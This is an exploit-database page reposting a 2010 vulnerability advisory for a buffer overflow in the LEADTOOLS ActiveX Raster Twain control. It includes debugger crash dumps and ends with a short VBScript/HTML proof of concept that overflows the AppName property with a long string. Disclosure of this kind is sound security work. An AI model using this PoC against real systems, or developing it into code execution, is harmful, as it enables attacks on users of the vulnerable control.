[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Leadtools ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Buffer Overflow

Author
LiquidWorm
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13895
Category
dos / poc
Date add
28-08-2010
Platform
windows
======================================================================
Leadtools ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Buffer Overflow
======================================================================

LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC
 
 
Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected Version: 16.5.0.2
 
Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.
 
Desc: The Raster Twain Object Library suffers from a buffer overflow
vulnerability because it fails to check the boundry of the user input.
 
 
Tested On: Microsoft Windows XP Professional SP3 (EN)
           Windows Internet Explorer 8.0.6001.18702
           RFgen Mobile Development Studio 4.0.0.06 (Enterprise)
 
 
===============================================================
 
(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!wcscpy+0xe:
7c912f4e 668901          mov     word ptr [ecx],ax        ds:0023:01649000=????
0:000> g
(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlpNtMakeTemporaryKey+0x6a74:
7c96c540 807b07ff        cmp     byte ptr [ebx+7],0FFh      ds:0023:00410040=??
 
==================================================================
 
 
Registers:
--------------------------------------------------
EIP 7C912F4E
EAX 00130041
EBX 100255BC -> 10014840 -> Asc: @H@H
ECX 01649000
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 00000000
ESI 0013EF6C -> BAAD0008
EBP 0013EDA8 -> 0013EDDC
ESP 0013EDA8 -> 0013EDDC
 
--
 
EIP 7C96C540
EAX 00410039
EBX 00410039
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97B5A0
EDI 00410041
ESI 00150000 -> 000000C8
EBP 0013F228 -> 0013F278
ESP 0013F220 -> 00150000
 
 
ArgDump:
--------------------------------------------------
EBP+8   016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12  0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16  00000000
EBP+20  0013EF6C -> BAAD0008
EBP+24  100255BC -> 10014840 -> Asc: @H@H
EBP+28  0013EDB8 -> 00000000
 
--
 
EBP+8   00150000 -> 000000C8
EBP+12  00410039
EBP+16  7C96DBA4 -> Asc: RtlGetUserInfoHeap
EBP+20  00000000
EBP+24  00410041
EBP+28  7C80FF12 -> 9868146A
 
 
CompanyName     LEAD Technologies, Inc.
FileDescription     LEADTOOLS ActiveX Raster Twain (Win32)
FileVersion     16,5,0,2
InternalName        LTRTNU
LegalCopyright      © 1991-2009 LEAD Technologies, Inc.
OriginalFileName        LTRTNU.DLL
ProductName     LEADTOOLS® for Win32
ProductVersion      16.5.0.0
 
 
Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
 
 
Exception Code: ACCESS_VIOLATION
 
Disasm: 7C912F4E    MOV [ECX],AX    (ntdll.dll)
Disasm: 7C96C540    CMP BYTE PTR [EBX+7],FF (ntdll.dll)
 
 
Exception Code: BREAKPOINT
 
Disasm: 7C90120E    INT3    (ntdll.dll)
 
Seh Chain:
--------------------------------------------------
1   7C839AC0    KERNEL32.dll
2   FC2950      VBSCRIPT.dll
3   7C90E900    ntdll.dll
 
 
7C912F4E    MOV [ECX],AX            <--- CRASH
7C96C540    CMP BYTE PTR [EBX+7],FF     <--- CRASH
7C90120F    RETN                <--- CRASH
 
 
==================================================================
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
 
Zero Science Lab - http://www.zeroscience.mk
 
24.08.2010
 
 
Zero Science Lab Advisory ID: ZSL-2010-4960
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php
 
 
 
PoC:
 
 
<object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
 
targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"
prototype  = "Property Let AppName As String"
memberName = "AppName"
progid     = "LTRASTERTWAINLib_U.LEADRasterTwain_U"
argCount   = 1
 
arg1=String(9236, "A")
 
target.AppName = arg1
 
</script>



#  0day.today [2024-12-24]  #